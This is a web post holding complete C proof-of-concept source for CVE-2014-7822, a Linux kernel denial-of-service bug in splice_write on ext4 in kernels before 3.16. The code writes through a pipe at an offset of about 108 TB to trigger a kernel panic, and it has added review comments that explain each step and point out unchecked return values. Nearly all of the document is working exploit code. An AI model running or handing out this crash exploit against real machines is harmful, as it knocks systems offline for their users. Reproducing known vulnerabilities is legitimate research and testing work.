
cve-2014-7822 Linux Kernel D.O.S POC

D 11 April 2015     H 15:14     A Emeric Nasi     C 0 messages


  1. /* ----------------------------------------------------------------------------------------------------
  2.  * cve-2014-7822_poc.c
  3.  *
  4.  * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file,
  5.  * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call,
  6.  * as demonstrated by use of a file descriptor associated with an ext4 filesystem.
  7.  *
  8.  *
  9.  * This is a POC to reproduce the vulnerability. No exploitation here, just a simple kernel panic.
  10.  * Works on ext4 filesystem
  11.  * Tested on Ubuntu with 3.13 and 3.14 kernels
  12.  *
  13.  * Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c
  14.  *
  15.  *
  16.  * Emeric Nasi - www.sevagas.com
  17.  *-----------------------------------------------------------------------------------------------------*/
  18.  
  19.  
  20. /* ----------------------- Includes ----------------------------*/
  21.  
  22. #define _GNU_SOURCE
  23. #include <fcntl.h>
  24. #include <stdio.h>
  25. #include <unistd.h>
  26. #include <errno.h>
  27. #include <string.h>
  28. #include <stdlib.h>
  29. #include <limits.h>
  30.  
  31. #define EXPLOIT_NAME "cve-2014-7822"
  32. #define EXPLOIT_TYPE DOS
  33.  
  34. #define JUNK_SIZE 30000
  35.  
  36. /* ----------------------- functions ----------------------------*/
  37.  
  38.  
  39. /* Useful:
  40.  *
  41. +============+===============================+===============================+
  42. | \ File flag| | |
  43. | \ | !EXT4_EXTENTS_FL | EXT4_EXTENTS_FL |
  44. |Fs Features\| | |
  45. +------------+-------------------------------+-------------------------------+
  46. | !extent | write: 2194719883264 | write: -------------- |
  47. | | seek: 2199023251456 | seek: -------------- |
  48. +------------+-------------------------------+-------------------------------+
  49. | extent | write: 4402345721856 | write: 17592186044415 |
  50. | | seek: 17592186044415 | seek: 17592186044415 |
  51. +------------+-------------------------------+-------------------------------+
  52. */
  53.  
  54.  
/**
 * Poc for cve_2014_7822 vulnerability.
 *
 * Moves JUNK_SIZE bytes from zul.txt through a pipe into zug.txt with
 * splice(), passing an output offset of 118402345721856 (~108 TB). Per the
 * file header, kernels before 3.16 do not check this offset against the
 * filesystem's maximum file size on the splice_write path, and the system
 * panics some time afterwards. Denial of service only; nothing is
 * escalated.
 *
 * Side effects: creates/truncates zul.txt and zug.txt in the current
 * working directory and leaves them behind.
 *
 * Returns 0 once the second splice() has been issued; exits with status 1
 * if that splice() fails.
 *
 * NOTE(review): the return values of pipe(), open(), write() and the first
 * splice() are never checked, so on any early failure the later calls run
 * with -1 descriptors and the problem only surfaces (if at all) at the
 * final splice().
 */
int main()
{
    int pipefd[2];
    int result;
    int in_file;
    int out_file;
    int zulHandler;
    loff_t viciousOffset = 0;

    /* Zero-initialised source buffer; filled with 'A' below. */
    char junk[JUNK_SIZE] ={0};

    /* Return value is stored but never checked. */
    result = pipe(pipefd);

    // Create and clear zug.txt and zul.txt files
    // NOTE(review): system() spawns a shell just to truncate two files;
    // open(path, O_RDWR | O_CREAT | O_TRUNC, 0600) does the same without a
    // shell and with a return value that can be checked.
    system("cat /dev/null > zul.txt");
    system("cat /dev/null > zug.txt");

    // Fill zul.txt with A
    zulHandler = open("zul.txt", O_RDWR);
    memset(junk,'A',JUNK_SIZE);
    write(zulHandler, junk, JUNK_SIZE);   // unchecked: may write fewer than JUNK_SIZE bytes
    close(zulHandler);

    //put content of zul.txt in pipe
    viciousOffset = 0;
    in_file = open("zul.txt", O_RDONLY);
    // File -> pipe; the 0/NULL offset arguments make splice() use the
    // descriptors' own file positions. Result is not checked.
    result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);
    close(in_file);


    // Put content of pipe in zug.txt
    out_file = open("zug.txt", O_RDWR);
    viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!
    // The cast keeps the %lu specifier matched to its argument type.
    printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset);

    // Pipe -> zug.txt at viciousOffset. This is the splice_write the header
    // describes: the offset is far beyond what the filesystem can hold, and
    // kernels before 3.16 do not reject it on this path.
    result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615
    if (result == -1)
    {
        // The only error path that is reported; a kernel that enforces the
        // file-size limit is expected to fail this call instead of panicking.
        printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno));
        exit(1);
    }
    close(out_file);

    close(pipefd[0]);
    close(pipefd[1]);


    //Open zug.txt
    // NOTE(review): purpose not stated in the original; presumably re-opens
    // the file whose size now exceeds the filesystem limit -- confirm.
    in_file = open("zug.txt", O_RDONLY);
    close(in_file);

    printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n");

    return 0;
}


